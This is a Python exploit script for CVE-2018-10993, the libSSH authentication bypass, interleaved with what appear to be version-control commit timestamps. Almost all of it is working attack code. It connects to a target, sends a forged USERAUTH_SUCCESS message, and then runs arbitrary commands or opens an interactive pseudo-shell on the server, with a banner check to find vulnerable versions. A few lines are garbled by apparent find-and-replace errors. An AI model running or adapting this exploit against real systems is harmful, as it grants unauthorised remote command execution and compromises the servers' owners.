2019-03-05 10:15:40 +01:00
#!/usr/bin/python3
#
# CVE-2018-10993 libSSH authentication bypass exploit
#
# The libSSH library has flawed authentication/connection state-machine.
# Upon receiving from connecting client the MSG_USERAUTH_SUCCESS Message
# (as described in RFC4252, sec. 5.1.) which is an authentication response message
# that should be returned by the server itself (not accepted from client)
# the libSSH switches to successful post-authentication state. In such state,
# it impersonates connecting client as server's root user and begins executing
# delivered commands.
# This results in opening an authenticated remote-access channel
# without any authentication attempts (authentication bypass).
#
# Below exploit contains modified code taken from:
# - https://github.com/leapsecurity/libssh-scanner
#
# Known issues:
# - UnauthSSH.shell() function is not working:
# I never got paramiko.Channel.invoke_shell() into working from custom
# transport object. Therefore as a workaround - `UnauthSSH.parashell()` function
# was implemented that substitutes original functionality of spawning shell.
#
# Requirements:
# - paramiko
#
2021-10-24 23:11:42 +02:00
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
2019-03-05 10:15:40 +01:00
#
import sys
import socket
import time
import argparse
from sys import argv , exit
try :
import paramiko
except ImportError :
print ( ' [!] Paramiko required: python3 -m pip install paramiko ' )
sys . exit ( 1 )
VERSION = ' 0.1 '
config = {
' debug ' : False ,
' verbose ' : False ,
' host ' : ' ' ,
' port ' : 22 ,
' log ' : ' ' ,
' connection_timeout ' : 5.0 ,
' session_timeout ' : 10.0 ,
' buflen ' : 4096 ,
' command ' : ' ' ,
' shell ' : False ,
}
class Logger :
@staticmethod
def _out ( x ) :
if config [ ' debug ' ] or config [ ' verbose ' ] :
sys . stdout . write ( x + ' \n ' )
@staticmethod
def dbg ( x ) :
if config [ ' debug ' ] :
sys . stdout . write ( ' [dbg] ' + x + ' \n ' )
@staticmethod
def out ( x ) :
Logger . _out ( ' [.] ' + x )
@staticmethod
def info ( x ) :
Logger . _out ( ' [?] ' + x )
@staticmethod
def err ( x ) :
sys . stdout . write ( ' [!] ' + x + ' \n ' )
@staticmethod
def fail ( x ) :
Logger . _out ( ' [-] ' + x )
@staticmethod
def ok ( x ) :
Logger . _out ( ' [+] ' + x )
class UnauthSSH ( ) :
def __init__ ( self ) :
self . host = config [ ' host ' ]
self . port = config [ ' port ' ]
self . sock = None
self . transport = None
self . connectionInfoOnce = False
def __del__ ( self ) :
if self . sock :
self . sock . close ( )
def sshAuthBypass ( self , force = False ) :
if not force and ( self . transport and self . transport . is_active ( ) ) :
Logger . dbg ( ' Returning already issued SSH Transport ' )
return self . transport
self . __del__ ( )
self . sock = socket . socket ( )
if not self . connectionInfoOnce :
self . connectionInfoOnce = True
Logger . info ( ' Connecting with {} : {} ... ' . format (
self . host , self . port
) )
try :
self . sock . connect ( ( str ( self . host ) , int ( self . port ) ) )
Logger . ok ( ' Connected. ' )
except Exception as e :
Logger . fail ( ' Could not connect to {} : {} . Exception: {} ' . format (
self . host , self . port , str ( e )
) )
sys . exit ( 1 )
message = paramiko . message . Message ( )
message . add_byte ( paramiko . common . cMSG_USERAUTH_SUCCESS )
transport = paramiko . transport . Transport ( self . sock )
transport . start_client ( timeout = config [ ' connection_timeout ' ] )
transport . _send_message ( message )
self . transport = transport
return transport
def NOT_WORKING_shell ( self ) :
# FIXME: invoke_shell() closes channel prematurely.
transport = self . sshAuthBypass ( )
session = transport . open_session ( timeout = config [ ' session_timeout ' ] )
session . set_combine_stdLogger . err ( True )
session . get_pty ( )
session . invoke_shell ( )
username = UnauthSSH . _send_recv ( session , ' username ' )
hostname = UnauthSSH . _send_recv ( session , ' hostname ' )
prompt = ' {} @ {} $ ' . format ( username , hostname )
while True :
inp = input ( prompt ) . strip ( )
if inp . lower ( ) in [ ' exit ' , ' quit ' ] or not inp :
Logger . info ( ' Quitting... ' )
break
out = UnauthSSH . _send_recv ( session , inp )
if not out :
Logger . err ( ' Could not constitute stable shell. ' )
return
print ( out )
def shell ( self ) :
self . parashell ( )
def parashell ( self ) :
username = self . execute ( ' whoami ' )
hostname = self . execute ( ' hostname ' )
prompt = ' {} @ {} $ ' . format ( username , hostname )
if not username or not hostname :
Logger . fail ( ' Could not obtain username ( {} ) and/or hostname ( {} )! ' . format (
username , hostname
) )
return
Logger . info ( ' Entering pseudo-shell... ' )
while True :
inp = input ( prompt ) . strip ( )
if inp . lower ( ) in [ ' exit ' , ' quit ' ] or not inp :
Logger . info ( ' Quitting... ' )
break
out = self . execute ( inp )
if not out :
Logger . err ( ' Could not constitute stable shell. ' )
return
print ( out )
# FIXME: Not used as NOT_WORKING_shell() is bugged.
@staticmethod
def _send_recv ( session , cmd ) :
out = ' '
session . send ( cmd . strip ( ) + ' \n ' )
MAX_TIMEOUT = config [ ' session_timeout ' ]
timeout = 0.0
while not session . exit_status_ready ( ) :
time . sleep ( 0.1 )
timeout + = 0.1
if timeout > MAX_TIMEOUT :
return None
if session . recv_ready ( ) :
out + = session . recv ( config [ ' buflen ' ] ) . decode ( )
if session . recv_stderr_ready ( ) :
out + = session . recv_stdLogger . err ( config [ ' buflen ' ] ) . decode ( )
while session . recv_ready ( ) :
out + = session . recv_ready ( config [ ' buflen ' ] )
return out
@staticmethod
def _exec ( session , inp ) :
inp = inp . strip ( )
Logger . dbg ( ' Executing command: " {} " ' . format ( inp ) )
session . exec_command ( inp + ' \n ' )
retcode = session . recv_exit_status ( )
buf = ' '
while session . recv_ready ( ) :
buf + = session . recv ( config [ ' buflen ' ] ) . decode ( )
buf = buf . strip ( )
Logger . dbg ( ' Returned: \n {} ' . format ( buf ) )
return buf
def execute ( self , cmd , printout = False , tryAgain = False ) :
transport = self . sshAuthBypass ( force = tryAgain )
session = transport . open_session ( timeout = config [ ' session_timeout ' ] )
session . set_combine_stderr ( True )
buf = ' '
try :
buf = UnauthSSH . _exec ( session , cmd )
except paramiko . SSHException as e :
if ' channel closed ' in str ( e ) . lower ( ) and not tryAgain :
return self . execute ( cmd , printout , True )
if printout and not tryAgain :
Logger . fail ( ' Could not execute command ( {} ): " {} " ' . format ( cmd , str ( e ) ) )
return ' '
if printout :
print ( ' \n {} $ {} ' . format ( self . host , cmd ) )
print ( ' {} ' . format ( buf ) )
return buf
def exploit ( ) :
handler = UnauthSSH ( )
if config [ ' command ' ] :
out = handler . execute ( config [ ' command ' ] )
Logger . _out ( ' \n $ {} ' . format ( config [ ' command ' ] ) )
print ( out )
else :
handler . shell ( )
def collectBanner ( ) :
ip = config [ ' host ' ]
port = config [ ' port ' ]
try :
s = socket . create_connection ( ( ip , port ) , timeout = config [ ' connection_timeout ' ] )
Logger . ok ( ' Connected to the target: {} : {} ' . format ( ip , port ) )
s . settimeout ( None )
banner = s . recv ( config [ ' buflen ' ] )
s . close ( )
return banner . split ( b " \n " ) [ 0 ]
except ( socket . timeout , socket . error ) as e :
Logger . fail ( ' SSH connection timeout. ' )
return " "
def check ( ) :
global config
if not config [ ' command ' ] and not config [ ' shell ' ] :
config [ ' verbose ' ] = True
banner = collectBanner ( )
if banner :
Logger . info ( ' Obtained banner: " {} " ' . format ( banner . decode ( ) . strip ( ) ) )
#
# NOTICE: The below version-checking logic was taken from:
# - https://github.com/leapsecurity/libssh-scanner
#
if any ( version in banner for version in [ b " libssh-0.6 " , b " libssh_0.6 " ] ) :
Logger . ok ( ' Target seems to be VULNERABLE! ' )
elif any ( version in banner for version in [ b " libssh-0.7 " , b " libssh_0.7 " ] ) :
# libssh is 0.7.6 or greater (patched)
if int ( banner . split ( b " . " ) [ - 1 ] ) > = 6 :
Logger . info ( ' Target seems to be PATCHED. ' )
else :
Logger . ok ( ' Target seems to be VULNERABLE! ' )
return True
elif any ( version in banner for version in [ b " libssh-0.8 " , b " libssh_0.8 " ] ) :
# libssh is 0.8.4 or greater (patched)
if int ( banner . split ( b " . " ) [ - 1 ] ) > = 4 :
Logger . info ( ' Target seems to be PATCHED. ' )
else :
Logger . ok ( ' Target seems to be VULNERABLE! ' )
return True
else :
Logger . fail ( ' Target is not vulnerable. ' )
else :
Logger . err ( ' Could not obtain SSH service banner. ' )
return False
def parse_opts ( ) :
global config
parser = argparse . ArgumentParser ( description = ' If there was neither shell nor command option specified - exploit will switch to detect mode yielding vulnerable/not vulnerable flag. ' )
parser . add_argument ( ' host ' , help = ' Hostname/IP address that is running vulnerable libSSH server. ' )
parser . add_argument ( ' -p ' , ' --port ' , help = ' libSSH port ' , default = 22 )
parser . add_argument ( ' -s ' , ' --shell ' , help = ' Exploit the vulnerability and spawn pseudo-shell ' , action = ' store_true ' , default = False )
parser . add_argument ( ' -c ' , ' --command ' , help = ' Execute single command. ' , default = ' ' )
parser . add_argument ( ' --logfile ' , help = ' Logfile to write paramiko connection logs ' , default = " " )
parser . add_argument ( ' -v ' , ' --verbose ' , action = ' store_true ' , help = ' Display verbose output. ' )
parser . add_argument ( ' -d ' , ' --debug ' , action = ' store_true ' , help = ' Display debug output. ' )
args = parser . parse_args ( )
try :
config [ ' host ' ] = args . host
config [ ' port ' ] = args . port
config [ ' log ' ] = args . logfile
config [ ' command ' ] = args . command
config [ ' shell ' ] = args . shell
config [ ' verbose ' ] = args . verbose
config [ ' debug ' ] = args . debug
if args . shell and args . command :
Logger . err ( ' Shell and command options are mutually exclusive! \n ' )
raise Exception ( )
except :
parser . print_help ( )
return False
return True
def main ( ) :
sys . stderr . write ( '''
: : CVE - 2018 - 10993 libSSH authentication bypass exploit .
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication .
2021-10-24 23:11:42 +02:00
Mariusz Banach / mgeeky ' 18, <mb@binary-offensive.com>
2019-03-05 10:15:40 +01:00
v { }
''' .format(VERSION))
if not parse_opts ( ) :
return False
if config [ ' log ' ] :
paramiko . util . log_to_file ( config [ ' log ' ] )
check ( )
if config [ ' command ' ] or config [ ' shell ' ] :
exploit ( )
if __name__ == ' __main__ ' :
main ( )